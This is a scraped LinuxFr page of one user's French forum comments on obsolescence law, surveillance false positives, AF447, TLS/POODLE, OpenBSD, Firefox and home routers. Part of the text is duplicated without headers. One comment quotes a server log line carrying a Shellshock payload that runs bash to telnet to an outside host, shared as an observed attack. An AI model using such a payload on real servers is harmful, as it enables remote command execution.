Je me permet de mettre un lien vers la proposition que j’ai soumise, afin d’avoir un retour, si ça se trouve, ce n’est pas approprié et ne mérite pas de soutient, mais au cas où, autant qu’il y ait le maximum de votes (pour, contre ou mitigé) voir de modifications.
TL;DR;
Il s’agit de propositions portées essentiellement sur l’internet des objets et globalement tout équipement comportant du code informatique (rédigé comme tel, ça doit pouvoir s’appliquer aussi à l’informatique « standard » et avoir une influence très légère sur la vente liée) visant :
À obliger les vendeurs d’objets numériques à maintenir leurs logiciels (obsolescence programmée, failles de sécurités jamais corrigées…).
À favoriser les logiciels libres (même si ce n’est jamais présenté explicitement).
À définir un cadre visant à limiter l’ossification du net.
Tu as raison, l’USB à vaincu, on n’a plus besoin des autres connectiques sur un PC portable…
En attendant, on a plus lourd d’adaptateurs et autres câbles dans le sac que le portable lui même, en attendant bien sûr l’adaptateur universel : https://xkcd.com/1406/
Il s’agit juste de statistiques de base.
Deux hypothèses de surveillance ressortent de ton commentaire :
L’état cible tout les contestataires, inoffensifs pour la population ou dangereux.
Étant donné que le nombre de contestataires non dangereux est beaucoup plus important que le nombre de terroristes (en puissance ou prêt à agir), il y aura toujours bien plus de gens bien que de terroristes à se faire attraper, harceler…
L’état ne cible que les terroristes (en puissance ou non).
Le nombre de personnes dangereuses étant ridiculement petit face à la population générale, on tombe dans le paradoxe des taux de détection :
Soit une population de 1 000 000 de personnes, 10 terroristes et une méthode de détection avec 99% de taux de détection et 0,01% de faux positifs, ça nous fait 9 terroristes attrapés et 100 innocents en prison…
Tu peux tourner le problème dans tous les sens, la surveillance massive d’internet et les tentatives de détection à partir de signaux faibles entraînera toujours un nombre d’erreurs supérieur au nombre de terroristes arrêtés, et on n’empêchera jamais tous les passages à l’actes, d’où l’inefficacité globale du système puisqu’un seul suffit.
Ils peuvent écrire tout ce qu’ils veulent dans leurs conditions générales, FAQ, licences, dans ce cas précis, ça n’a pas vraiment d’importance puisque l’auteur du journal évoque une méthode lui permettant de réaliser une copie papier qui entre parfaitement dans le cadre de la copie privée dans qu’il effectue la copie, et l’impression lui même et que l’utilisation du bout de papier est confinée à son cercle amical.
Il faudrait cependant s’assurer que le site JGN qui lui met à disposition des données issues de l’IGN respecte bien la licence (ce qui pourrait en cas de non respect entraîner un recel de contrefaçon). Deux indices semblent cependant aller dans le sens de la légalité :
Les restrictions de la taille d’impression sur le site semblent correspondre au restrictions énoncées par l’IGN. Ils tentent donc au moins dans l’utilisation prévue de leur site de respecter la licence à priori.
Le site n’est pas fermé, ce qui vu comment l’IGN défend ardemment ses droits donne une bonne indication…
Dernier point qui pourrait être reproché à l’auteur : fourniture d’une méthode de contournement DRM, mais vu la trivialité des manipulations et la non divulgation d’outils ou de matériel mettant à mal une quelconque solution cryptographique, la violation devrait être difficile à défendre.
Il semblerait que Compass Keyboard reprenne le fonctionnement de Messagease. Dasher semble intéressant aussi (je crois que le concept avait fait l’objet d’un article ici même il y a quelques années).
Je le déploie dans un Établissement Public Administratif rattaché au ministère de la culture sur environ 400 postes de travail. C’est relativement récent (la gestion du packaging était moins souple et on utilisait une version « obsolète » d’OpenOffice.org précédemment).
La suite étant installées en parallèle de celle de Microsoft, j’ai pu faire quelques comparaisons du correcteur grammatical. Je retrouve au doit mouillé les mêmes taux de détection / faux positifs, mais les erreurs détectées ne se recouvrent pas tout à fait. Par contre, Grammalecte est bien plus strict et pertinent sur la typographie (au passage, serait-il possible de détecter les doubles retours à la ligne et de suggérer de régler les interlignes dans le style de paragraphe ?).
En tout cas, merci pour ce super boulot.
Concernant la mise en place des tests, tu as pensé à en faire en automatique en pilotant un LibreOffice headless (ouverture des fichiers de référence, lancement d’une correction automatique, enregistrement en tant que fichier texte, diff avec le résultat attendu) via l’API UNO ?
Il n’y a aucune défaillance électronique dans l’accident du vol AF447, l’électronique a juste détecté une incohérence (la rendant inapte à prendre des décisions) entre les vitesses air à gauche et à droite lors du givrage des sondes pitot et rendu la main (désengagement du pilote automatique et de l’auto-manette, et réduction des protections automatiques de domaine de vol — l’informatique d’un Airbus t’empêche normalement de faire de la voltige avec, même si tu manœuvre les commandes en buttée). Ce qui est exactement ce qui était attendu d’elle et programmé dans la situation rencontrée.
Le reste, ce sont des erreurs de conception :
Sondes pitot qui givrent (problème connu pour ce modèle, elles étaient en cours de remplacement sur la flotte)
Alarme de décrochage qui ne fonctionne que si la vitesse air horizontale est supérieure à 60 nœuds (valeur choisie pour éviter des alarmes intempestives au roulage ou lors de phases d’atterrissage / décollage).
Absence de mise en évidence claire des valeurs (vitesses, attitude, etc.) considérées comme valides ce qui à certainement entraîné le doute sur toutes les valeurs affichées pour les pilotes alors que seules la vitesse air était mauvaise (et pendant un temps relativement court).
Absence d’affichage de l’incidence (angle entre le flux d’air et les ailes) qui aurait pu permettre aux pilote de réaliser la situation de décrochage.
Et de formation / réaction de l’équipage :
Non application de la procédure dite « IAS douteuse » lorsque les vitesses ne sont plus valides.
Non prise en compte des alarmes de décrochage.
Incompréhension totale de la situation (décrochage rattrapable pendant au moins 2 minutes en poussant sur le manche.
À la décharge des pilotes, voir les erreurs de conception, plus le fait que :
Ce type d’avion étant sensé t’empêcher de faire de la voltige, les approches de décrochage sont quasiment impossible et donc peut-être moins étudiées que sur d’autres appareils.
Les actions enseignées en simulateur pour sortir d’une approche de décrochage (cabrer légèrement + pousser les gaz à fond, le but étant ici de ne pas rendre d’altitude) sont contraire à celles à prendre pour sortir d’un décrochage engagé (pousser le manche pour se mettre en piqué + réduire les gaz afin d’une part de ne pas prendre trop de vitesse, d’autre part de faciliter l’action à piquer les moteurs placés sous les ailes pouvant avoir plus d’impact sur l’inclinaison que les surfaces mobiles mal « soufflées » lors d’un décrochage).
Les limites de la simulation informatique de l’écoulement de l’air turbulent et les coûts et risques qu’entraînerait la prise de mesures en conditions réelles d’un décrochage de tels appareils font qu’un pilote de ligne ne rencontre ni en simulateur ni normalement durant sa formation à bord de décrochage engagé, rendant cette situation potentiellement difficile à appréhender et même à envisager.
L’ajout de la recherche d’un site à la barre de recherche est natif dans firefox pour tous les sites annonçant au navigateur la prise en charge Opensearch (http://www.bortzmeyer.org/opensearch.html). Pour tous les autres, via un clic droit dans un champ de recherche puis "ajouter un mot clef pour cette recherche" il est possible de créer un marque page associé à un mot-clef qui lancera une recherche depuis la barre d’URL. Ce n’est pas forcément la panacée et on se retrouve avec deux listes différentes, mais ça fonctionne.
Et pour les gens comme moi qui associent un mot-clef à chaque moteur utilisé, c’est simple et rapide. Il m’a par exemple fallu 3 secondes pour créer le marque page « https://wiki.apache.org/spamassassin/Rules?action=fullsearch&context=180&value=%s » et lui associer le mot-clef « spam », il me suffit maintenant de taper « spam NOM_DE_REGLE » dans la barre l’URL pour expliquer à un client pourquoi son mail est passé en spam, j’associe également des mot-clefs comme gg pour google, wp pour Wikipedia… afin de faire des recherches directes tout au clavier sans avoir à choisir à la souris un moteur de recherche particulier dans la barre de recherche.
La mauvaise utilisation de la sous-autorité de certification du ministère des finances, en interne, par leurs équipes techniques n’a rien à voir avec l’ANSSI, d’ailleurs, la sous-autorité en question a été très rapidement révoquée par l’ANSSI…
Server_Name_Indication et un certificat StartSSL gratuit par vhost… Ça ne fonctionne pas avec IE/XP, mais on s’en fout, tu les à déjà disqualifiés avec une conf SSL n’exposant pas tes utilisateurs à POODLE. Tu as bien viré sslv3 ?
Pour la faille actuelle, ça ne sert pas à grand chose sur les vieux systèmes puisqu’il faut en effet que client et serveur prennent en charge cette nouvelle extension (implémentée côté client comme un nouvel algorithme de chiffrement ajouté à la suite des autres). Par contre, elle devrait répondre à ta question concernant le futur passage à TLSv1.3 ou TLSv3, tant que la validation des messages ChangeCipherSpec et Finished n’est pas cassée (ils permettent de confirmer au pair que la poignée de main initiale et notamment la suite d’algorithmes de chiffrements supportés n’a pas été modifiée par un MITM).
Pour IE6 et SSLv3, je crois qu’il n’y a plus rien à faire, SSLv3 était déjà connu pour ne pas être solide, là, c’est certainement le coup de grâce…
Pour les « avis » des utilisateurs, je ne sais pas, quoi que le BTS… Par contre pour les capture d’écran, il y a http://screenshots.debian.net qui est utilisé par au moins Synaptic et Ubuntu Software Center pour le moment. Par exemple :
Concernant la lenteur, c’est en effet assez lourd si on utilise apache mod-php sans apc, la structure du code fait que beaucoup de classes php sont alors compilées et instanciées à chaque requête. Installer APC apporte déjà pas mal de réactivité, et un passage à php-fpm rend le logiciel tout à fait utilisable. L’utilisation de l’extension XSendFile permet également un gain de performance important pour les téléchargements de gros fichiers (envoi du fichier directement par apache plutôt que par un stream php).
sous OpenBSD tu n'as pas besoin de compiler les ports (c'est fortement déconseillé d'ailleurs). Tu utilises le repos avec pkg_add :)
et tu lis ça comment :
Also recompile any statically-linked binaries depending on it - in
the base OS, this is just ftp(1)
Vu qu’on ne sait pas quels ports binaires sont compilés en statique, et que je n’ai rien vu concernant une recompilation des ports binaires suite à heartbleed (d’ailleurs, je n’ai jamais vu de mises à jour en dehors des upgrades de ces paquets), faut-il en conclure qu’il faut tout recompiler ?
Clairement, je ne vais pas faire l’upgrade sur ma soekris, quitte à avoir une demi journée de boulot et d’interruption de service, elle va repasser sous Debian, je pourrais utiliser les capacités 802.11n de la carte Wi-Fi et ne plus avoir + d’une heure d’arrêt pour les upgrades (et pour la sécurité, je reçois les mails de la liste sécu de Debian et j’installe apticron sur toutes mes machines, je peux réagir rapidement et en cas de faille, appliquer les mises à jour presque immédiatement sans attendre d’avoir 4h de libres…).
J’ai essayé pendant près de 2 ans, OpenBSD n’est pas fait pour moi, pourtant, je suis sysadmin à la base…
D’ailleurs, la gestion des intents sous android n’est pas au top non plus, Firafox est le seul navigateur qui ne me propose pas d’ouvrir un lien Wikipedia (et d’autres) avec l’application idoïne. Il y a une extension qui prend en charge quelques types de liens et applications (Open Native app), mais c’est loin d’être parfait (les liens Wikipedia ne sont pas détectés sur une page de recherche par exemple).
Malheureusement, il n’y a toujours aucune avancée sur ce point là, Firefox choisis toujours au hazard les applications avec lesquelles il ouvre les fichiers téléchargés (par exemple Calligra pour les documents bureautiques textes alors que mes différents WM et xdg-open utilisent Libreoffice) et aucun moyen simple de le configurer, il n’y a aucun moyen d’ajouter un type mime ou une extension de fichiers dans l’onglet « Applications », la configuration n’est pas accessible dans about:config, le dialogue de recherche d’une application n’est qu’un simple file-picker qui oblige à aller chercher dans /usr/bin l’application au lieu de présenter une liste des applications compatible dont les fichiers .desktop sont dans les répertoires XDG standards.
Des bugs sont ouverts depuis 2000 sur le sujet, mais rien n’a été fait, dommage…
J’aimerai au moins pouvoir ajouter une entrée . (ou /) → /usr/bin/xdg-open
Si je ne m’abuse, les produits ReadyNas de Netgear étaient sous sparc (et basés sur debian, si je me souviens bien), c’est toujours le cas ? Ça fait des machines relativement abordable pour cette architecture…
Est-il prévu d’implémenter une commande type local-install pour installer un .deb ayant des dépendances dans les dépôts, beaucoup plus simple et moins « bidouille » que la séquence
C’est une net5501-70 avec un DD sata et la carte Atheros AR9280 qui était vendue par Sokris à l’époque.
Il semblerait quand même qu’il y ait un problème au niveau du driver Openbsd pour les ports ethernets (http://www.openbsd.org/cgi-bin/man.cgi?query=vr&sektion=4#end) ou alors, je ne m’y prends pas comme il faut pour le bridging (bridge entre 3 des ports eth + le port wifi + un veth pour porter l’IP). Je vais voir à la repasser sous Linux quand j’aurai un peu de temps.
Je suis en train de monter une conf de remplacement à base d’un CAR-3000 de récup (ancienne appliance NuFW, 6 ports Giga, core 2 duo 4G de ram), le seul problème, c’est qu’il n’y a pas d’extension possible en PCI / PCE-E, j’en suis donc à essayer de trouver un dongle USB qui fasse du 802.11N en tant qu’AP avec de bonnes perfs…
Je suis assez déçu des performances de ma Soekris 5000, elle est sous OpenBSD, sur le bridge, je plafonne à 20Mb/s (CPU interrupt bound), le Wifi dont le signal est super bon, négocie à 54Mb/s mais plafonne entre 12 et 18. De mémoire, c’était un peu mieux sous Linux, mais pas flagrant, et sur les mailing listes Soekris, tout le monde semble dans la même situation. Il est possible que les séries 6xxx qui sont censées faire du Giga assurent mieux, mais vue le prix, j’hésite à franchir le pas…
# Lutte contre l’obsolescence programmée, ossification du net et priorité FOSS
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche Consultation « République numérique », soutenez les propositions de vos organisations préférées. Évalué à 3.
Je me permet de mettre un lien vers la proposition que j’ai soumise, afin d’avoir un retour, si ça se trouve, ce n’est pas approprié et ne mérite pas de soutient, mais au cas où, autant qu’il y ait le maximum de votes (pour, contre ou mitigé) voir de modifications.
TL;DR;
Il s’agit de propositions portées essentiellement sur l’internet des objets et globalement tout équipement comportant du code informatique (rédigé comme tel, ça doit pouvoir s’appliquer aussi à l’informatique « standard » et avoir une influence très légère sur la vente liée) visant :
https://www.republique-numerique.fr/consultations/projet-de-loi-numerique/consultation/consultation/opinions/section-4-information-des-consommateurs/protection-des-consommateurs-lutte-contre-l-obsolescence-programmee-et-encouragement-de-l-innovation
# Proposition Protection des consommateurs, lutte contre l’obsolescence programmée…
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Consultation « République Numérique » ouverte. Évalué à 2.
Je viens de proposer sur le site une série d’articles sur lesquels je bosse depuis quelques mois visant :
Les détails sont ici : https://www.republique-numerique.fr/consultations/projet-de-loi-numerique/consultation/consultation/opinions/section-4-information-des-consommateurs/protection-des-consommateurs-lutte-contre-l-obsolescence-programmee-et-encouragement-de-l-innovation
[^] # Re: RJ45
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche Librem 13, l’espoir d’avoir un jour un ordinateur libre. Évalué à 10.
Tu as raison, l’USB à vaincu, on n’a plus besoin des autres connectiques sur un PC portable…
En attendant, on a plus lourd d’adaptateurs et autres câbles dans le sac que le portable lui même, en attendant bien sûr l’adaptateur universel : https://xkcd.com/1406/
[^] # Re: Qui est trahi ?
Posté par Hobgoblins Master (Mastodon) . En réponse au journal La trahison de qui ?. Évalué à 9.
Il s’agit juste de statistiques de base.
Deux hypothèses de surveillance ressortent de ton commentaire :
Étant donné que le nombre de contestataires non dangereux est beaucoup plus important que le nombre de terroristes (en puissance ou prêt à agir), il y aura toujours bien plus de gens bien que de terroristes à se faire attraper, harceler…
Le nombre de personnes dangereuses étant ridiculement petit face à la population générale, on tombe dans le paradoxe des taux de détection :
Soit une population de 1 000 000 de personnes, 10 terroristes et une méthode de détection avec 99% de taux de détection et 0,01% de faux positifs, ça nous fait 9 terroristes attrapés et 100 innocents en prison…
Tu peux tourner le problème dans tous les sens, la surveillance massive d’internet et les tentatives de détection à partir de signaux faibles entraînera toujours un nombre d’erreurs supérieur au nombre de terroristes arrêtés, et on n’empêchera jamais tous les passages à l’actes, d’où l’inefficacité globale du système puisqu’un seul suffit.
[^] # Re: Tipiak
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Imprimer ses cartes IGN. Évalué à 9.
Ils peuvent écrire tout ce qu’ils veulent dans leurs conditions générales, FAQ, licences, dans ce cas précis, ça n’a pas vraiment d’importance puisque l’auteur du journal évoque une méthode lui permettant de réaliser une copie papier qui entre parfaitement dans le cadre de la copie privée dans qu’il effectue la copie, et l’impression lui même et que l’utilisation du bout de papier est confinée à son cercle amical.
Il faudrait cependant s’assurer que le site JGN qui lui met à disposition des données issues de l’IGN respecte bien la licence (ce qui pourrait en cas de non respect entraîner un recel de contrefaçon). Deux indices semblent cependant aller dans le sens de la légalité :
Dernier point qui pourrait être reproché à l’auteur : fourniture d’une méthode de contournement DRM, mais vu la trivialité des manipulations et la non divulgation d’outils ou de matériel mettant à mal une quelconque solution cryptographique, la violation devrait être difficile à défendre.
[^] # Re: Messagease
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Bépo sous Android. Évalué à 4.
Il semblerait que Compass Keyboard reprenne le fonctionnement de Messagease. Dasher semble intéressant aussi (je crois que le concept avait fait l’objet d’un article ici même il y a quelques années).
[^] # Re: Utilisation dans l'administration
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche Grammalecte, correcteur grammatical. Évalué à 10.
Je le déploie dans un Établissement Public Administratif rattaché au ministère de la culture sur environ 400 postes de travail. C’est relativement récent (la gestion du packaging était moins souple et on utilisait une version « obsolète » d’OpenOffice.org précédemment).
La suite étant installées en parallèle de celle de Microsoft, j’ai pu faire quelques comparaisons du correcteur grammatical. Je retrouve au doit mouillé les mêmes taux de détection / faux positifs, mais les erreurs détectées ne se recouvrent pas tout à fait. Par contre, Grammalecte est bien plus strict et pertinent sur la typographie (au passage, serait-il possible de détecter les doubles retours à la ligne et de suggérer de régler les interlignes dans le style de paragraphe ?).
En tout cas, merci pour ce super boulot.
Concernant la mise en place des tests, tu as pensé à en faire en automatique en pilotant un LibreOffice headless (ouverture des fichiers de référence, lancement d’une correction automatique, enregistrement en tant que fichier texte, diff avec le résultat attendu) via l’API UNO ?
[^] # Re: fiabilité !
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Les lois françaises favorisent-elles l’insécurité informatique ?. Évalué à 9.
Il n’y a aucune défaillance électronique dans l’accident du vol AF447, l’électronique a juste détecté une incohérence (la rendant inapte à prendre des décisions) entre les vitesses air à gauche et à droite lors du givrage des sondes pitot et rendu la main (désengagement du pilote automatique et de l’auto-manette, et réduction des protections automatiques de domaine de vol — l’informatique d’un Airbus t’empêche normalement de faire de la voltige avec, même si tu manœuvre les commandes en buttée). Ce qui est exactement ce qui était attendu d’elle et programmé dans la situation rencontrée.
Le reste, ce sont des erreurs de conception :
Et de formation / réaction de l’équipage :
À la décharge des pilotes, voir les erreurs de conception, plus le fait que :
[^] # Re: Hello et TokBox business model ?
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche Firefox 34, ce Hérault. Évalué à 4.
L’ajout de la recherche d’un site à la barre de recherche est natif dans firefox pour tous les sites annonçant au navigateur la prise en charge Opensearch (http://www.bortzmeyer.org/opensearch.html). Pour tous les autres, via un clic droit dans un champ de recherche puis "ajouter un mot clef pour cette recherche" il est possible de créer un marque page associé à un mot-clef qui lancera une recherche depuis la barre d’URL. Ce n’est pas forcément la panacée et on se retrouve avec deux listes différentes, mais ça fonctionne.
Et pour les gens comme moi qui associent un mot-clef à chaque moteur utilisé, c’est simple et rapide. Il m’a par exemple fallu 3 secondes pour créer le marque page « https://wiki.apache.org/spamassassin/Rules?action=fullsearch&context=180&value=%s » et lui associer le mot-clef « spam », il me suffit maintenant de taper « spam NOM_DE_REGLE » dans la barre l’URL pour expliquer à un client pourquoi son mail est passé en spam, j’associe également des mot-clefs comme gg pour google, wp pour Wikipedia… afin de faire des recherches directes tout au clavier sans avoir à choisir à la souris un moteur de recherche particulier dans la barre de recherche.
# ANSSI
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Il est temps que vous ayez un meilleur HTTPS. Évalué à 8.
La mauvaise utilisation de la sous-autorité de certification du ministère des finances, en interne, par leurs équipes techniques n’a rien à voir avec l’ANSSI, d’ailleurs, la sous-autorité en question a été très rapidement révoquée par l’ANSSI…
http://reflets.info/mitm-de-google-par-l-anssi-la-theorie-du-doigt-qui-pointait-la-lune/
http://www.ssi.gouv.fr/fr/menu/actualites/suppression-d-une-branche-de-l-igc-a.html
[^] # Re: CA-CERT ?
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche Firefox : dites 33, comme chez le docteur. Évalué à 3.
Server_Name_Indication et un certificat StartSSL gratuit par vhost… Ça ne fonctionne pas avec IE/XP, mais on s’en fout, tu les à déjà disqualifiés avec une conf SSL n’exposant pas tes utilisateurs à POODLE. Tu as bien viré sslv3 ?
[^] # Re: Quelques ressources supplémentaires sur le sujet
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche CVE-2014-3566 — Vulnérabilité POODLE. Évalué à 3.
Pour la faille actuelle, ça ne sert pas à grand chose sur les vieux systèmes puisqu’il faut en effet que client et serveur prennent en charge cette nouvelle extension (implémentée côté client comme un nouvel algorithme de chiffrement ajouté à la suite des autres). Par contre, elle devrait répondre à ta question concernant le futur passage à TLSv1.3 ou TLSv3, tant que la validation des messages
ChangeCipherSpecetFinishedn’est pas cassée (ils permettent de confirmer au pair que la poignée de main initiale et notamment la suite d’algorithmes de chiffrements supportés n’a pas été modifiée par un MITM).Pour IE6 et SSLv3, je crois qu’il n’y a plus rien à faire, SSLv3 était déjà connu pour ne pas être solide, là, c’est certainement le coup de grâce…
[^] # Re: Quelques ressources supplémentaires sur le sujet
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche CVE-2014-3566 — Vulnérabilité POODLE. Évalué à 4.
Concernant la rétrogradation de protocole, il y a ça : https://datatracker.ietf.org/doc/draft-ietf-tls-downgrade-scsv/ qui est utilisé par OpenSSL dans le jeu de mises à jour de sécurité livré mercredi (https://www.openssl.org/news/secadv_20141015.txt). Mais encore à l’état de brouillon.
[^] # Re: Les attaques de serveur ont déjà commencé
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Mets à jour ton bash. Maintenant.. Évalué à 3.
J’ai vu passer ça aussi :
114.91.x.x - - [25/Sep/2014:20:51:09 +0200] "GET / HTTP/1.1" 200 418 "-" "() { :;}; /bin/bash -c \"telnet 197.242.x.x 9998\""[^] # Re: Et pourtant il y a bien trop de packages
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Pourquoi écrire un package Debian est-il si compliqué?. Évalué à 5.
Pour les « avis » des utilisateurs, je ne sais pas, quoi que le BTS… Par contre pour les capture d’écran, il y a http://screenshots.debian.net qui est utilisé par au moins Synaptic et Ubuntu Software Center pour le moment. Par exemple :
# À propos des moins…
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Pydio, une bonne alternative à Owncloud pour la synchro des fichiers. Évalué à 10.
Concernant la lenteur, c’est en effet assez lourd si on utilise apache mod-php sans apc, la structure du code fait que beaucoup de classes php sont alors compilées et instanciées à chaque requête. Installer APC apporte déjà pas mal de réactivité, et un passage à php-fpm rend le logiciel tout à fait utilisable. L’utilisation de l’extension XSendFile permet également un gain de performance important pour les téléchargements de gros fichiers (envoi du fichier directement par apache plutôt que par un stream php).
Pour ce qui est de la synchro, ça arrive : https://github.com/pydio/pydio-sync et https://github.com/pydio/pydio-sync-ui (je n’ai pas encore testé).
Je précise que je n’ai pas d’actions, j’utilise juste personnellement et professionnellement depuis un moment, et j’en suis satisfait.
[^] # Re: Corrigé
Posté par Hobgoblins Master (Mastodon) . En réponse à l’entrée du suivi La liste des sections est envahissante sur mobile avec la CSS par défaut. . Évalué à 2 (+0/-0).
Merci.
[^] # Re: Précisions
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche OpenBSD 5.5 : nous ne voulons pas retourner dans le passé !. Évalué à 1.
et tu lis ça comment :
Vu qu’on ne sait pas quels ports binaires sont compilés en statique, et que je n’ai rien vu concernant une recompilation des ports binaires suite à heartbleed (d’ailleurs, je n’ai jamais vu de mises à jour en dehors des upgrades de ces paquets), faut-il en conclure qu’il faut tout recompiler ?
Clairement, je ne vais pas faire l’upgrade sur ma soekris, quitte à avoir une demi journée de boulot et d’interruption de service, elle va repasser sous Debian, je pourrais utiliser les capacités 802.11n de la carte Wi-Fi et ne plus avoir + d’une heure d’arrêt pour les upgrades (et pour la sécurité, je reçois les mails de la liste sécu de Debian et j’installe apticron sur toutes mes machines, je peux réagir rapidement et en cas de faille, appliquer les mises à jour presque immédiatement sans attendre d’avoir 4h de libres…).
J’ai essayé pendant près de 2 ans, OpenBSD n’est pas fait pour moi, pourtant, je suis sysadmin à la base…
[^] # Re: Intégration Linux de l’ouverture de fichiers téléchargés et des URL non prises en charge par FF.
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche Un nouveau pelage pour Firefox 29. Évalué à 2.
D’ailleurs, la gestion des intents sous android n’est pas au top non plus, Firafox est le seul navigateur qui ne me propose pas d’ouvrir un lien Wikipedia (et d’autres) avec l’application idoïne. Il y a une extension qui prend en charge quelques types de liens et applications (Open Native app), mais c’est loin d’être parfait (les liens Wikipedia ne sont pas détectés sur une page de recherche par exemple).
# Intégration Linux de l’ouverture de fichiers téléchargés et des URL non prises en charge par FF.
Posté par Hobgoblins Master (Mastodon) . En réponse à la dépêche Un nouveau pelage pour Firefox 29. Évalué à 10.
Malheureusement, il n’y a toujours aucune avancée sur ce point là, Firefox choisis toujours au hazard les applications avec lesquelles il ouvre les fichiers téléchargés (par exemple Calligra pour les documents bureautiques textes alors que mes différents WM et xdg-open utilisent Libreoffice) et aucun moyen simple de le configurer, il n’y a aucun moyen d’ajouter un type mime ou une extension de fichiers dans l’onglet « Applications », la configuration n’est pas accessible dans about:config, le dialogue de recherche d’une application n’est qu’un simple file-picker qui oblige à aller chercher dans /usr/bin l’application au lieu de présenter une liste des applications compatible dont les fichiers .desktop sont dans les répertoires XDG standards.
Des bugs sont ouverts depuis 2000 sur le sujet, mais rien n’a été fait, dommage…
J’aimerai au moins pouvoir ajouter une entrée . (ou /) → /usr/bin/xdg-open
# Netgear ReadyNas
Posté par Hobgoblins Master (Mastodon) . En réponse au journal Sparc chez Debian, c'est fini. Évalué à 4.
Si je ne m’abuse, les produits ReadyNas de Netgear étaient sous sparc (et basés sur debian, si je me souviens bien), c’est toujours le cas ? Ça fait des machines relativement abordable pour cette architecture…
# local-install
Posté par Hobgoblins Master (Mastodon) . En réponse au journal APT : nouvelle version 1.0. Évalué à 2.
Est-il prévu d’implémenter une commande type local-install pour installer un .deb ayant des dépendances dans les dépôts, beaucoup plus simple et moins « bidouille » que la séquence
[^] # Re: Soekris, ou une ALIX + carte Wifi
Posté par Hobgoblins Master (Mastodon) . En réponse au message Routeur. Évalué à 2.
C’est une net5501-70 avec un DD sata et la carte Atheros AR9280 qui était vendue par Sokris à l’époque.
Il semblerait quand même qu’il y ait un problème au niveau du driver Openbsd pour les ports ethernets (http://www.openbsd.org/cgi-bin/man.cgi?query=vr&sektion=4#end) ou alors, je ne m’y prends pas comme il faut pour le bridging (bridge entre 3 des ports eth + le port wifi + un veth pour porter l’IP). Je vais voir à la repasser sous Linux quand j’aurai un peu de temps.
Je suis en train de monter une conf de remplacement à base d’un CAR-3000 de récup (ancienne appliance NuFW, 6 ports Giga, core 2 duo 4G de ram), le seul problème, c’est qu’il n’y a pas d’extension possible en PCI / PCE-E, j’en suis donc à essayer de trouver un dongle USB qui fasse du 802.11N en tant qu’AP avec de bonnes perfs…
[^] # Re: Soekris, ou une ALIX + carte Wifi
Posté par Hobgoblins Master (Mastodon) . En réponse au message Routeur. Évalué à 2.
Je suis assez déçu des performances de ma Soekris 5000, elle est sous OpenBSD, sur le bridge, je plafonne à 20Mb/s (CPU interrupt bound), le Wifi dont le signal est super bon, négocie à 54Mb/s mais plafonne entre 12 et 18. De mémoire, c’était un peu mieux sous Linux, mais pas flagrant, et sur les mailing listes Soekris, tout le monde semble dans la même situation. Il est possible que les séries 6xxx qui sont censées faire du Giga assurent mieux, mais vue le prix, j’hésite à franchir le pas…
# Il y a une extension qui fait ça…
Posté par Hobgoblins Master (Mastodon) . En réponse au message accéder a des calendriers partagés gérés par exchange 2003. Évalué à 5.
Tu as essayé le paquet calendar-exchange-provider pour icedove/iceowl-extension, sachant que pour les mails, il peut utiliser DavMail…